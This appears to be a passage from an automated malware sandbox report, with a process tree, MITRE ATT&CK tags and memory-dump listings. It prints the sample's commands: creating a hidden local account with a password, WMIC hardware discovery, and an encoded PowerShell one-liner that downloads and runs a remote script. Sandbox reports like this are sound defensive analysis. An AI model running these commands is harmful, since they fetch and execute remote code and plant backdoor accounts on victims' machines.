    C:\Windows\system32\net1 user WgaUtilAcc icvblpAe
    3⤵
    PID:1284

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:3852
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  PID:3324

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:496
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  PID:2336

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2664
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:3260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:1596

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/496-214-0x000002B666048000-0x000002B66604A000-memory.dmp

Filesize
8KB

Download
memory/496-177-0x000002B666046000-0x000002B666048000-memory.dmp

Filesize
8KB

Download
memory/496-172-0x000002B666043000-0x000002B666045000-memory.dmp

Filesize
8KB

Download
memory/496-170-0x000002B666040000-0x000002B666042000-memory.dmp

Filesize
8KB

Download
memory/640-116-0x00000179E9670000-0x00000179E9672000-memory.dmp

Filesize
8KB

Download
memory/640-117-0x00000179E9673000-0x00000179E9675000-memory.dmp

Filesize
8KB

Download
memory/640-119-0x00000179E9676000-0x00000179E9677000-memory.dmp

Filesize
4KB

Download
memory/640-114-0x00000179E9A90000-0x00000179E9E8F000-memory.dmp

Filesize
4.0MB

Download
memory/640-118-0x00000179E9675000-0x00000179E9676000-memory.dmp

Filesize
4KB

Download
memory/1364-129-0x00000238216F0000-0x00000238216F1000-memory.dmp

Filesize
4KB

Download
memory/1364-153-0x0000023821CD0000-0x0000023821CD1000-memory.dmp

Filesize
4KB

Download
memory/1364-145-0x0000023808BF0000-0x0000023808BF1000-memory.dmp

Filesize
4KB

Download
memory/1364-140-0x0000023806E56000-0x0000023806E58000-memory.dmp

Filesize
8KB

Download
memory/1364-154-0x0000023822060000-0x0000023822061000-memory.dmp

Filesize
4KB

Download
memory/1364-135-0x0000023806E50000-0x0000023806E52000-memory.dmp

Filesize
8KB

Download
memory/1364-152-0x0000023806E58000-0x0000023806E59000-memory.dmp

Filesize
4KB

Download
memory/1364-136-0x0000023806E53000-0x0000023806E55000-memory.dmp

Filesize
8KB

Download
memory/1364-126-0x0000023808B90000-0x0000023808B91000-memory.dmp

Filesize
4KB

Download
memory/1596-391-0x0000021B9C506000-0x0000021B9C508000-memory.dmp

Filesize
8KB

Download
memory/1596-386-0x0000021B9C503000-0x0000021B9C505000-memory.dmp

Filesize
8KB

Download
memory/1596-385-0x0000021B9C500000-0x0000021B9C502000-memory.dmp

Filesize
8KB

Download
memory/1596-429-0x0000021B9C508000-0x0000021B9C509000-memory.dmp

Filesize
4KB

Download
memory/2468-241-0x0000028F9E376000-0x0000028F9E378000-memory.dmp

Filesize
8KB

Download
memory/2468-216-0x0000028F9E370000-0x0000028F9E372000-memory.dmp

Filesize
8KB

Download
memory/2468-217-0x0000028F9E373000-0x0000028F9E375000-memory.dmp

Filesize
8KB

Download
memory/2608-289-0x000001DE19796000-0x000001DE19798000-memory.dmp

Filesize
8KB

Download
memory/2608-291-0x000001DE19798000-0x000001DE1979A000-memory.dmp

Filesize
8KB

Download
memory/2608-262-0x000001DE19790000-0x000001DE19792000-memory.dmp

Filesize
8KB

Download
memory/2608-264-0x000001DE19793000-0x000001DE19795000-memory.dmp

Filesize
8KB

Download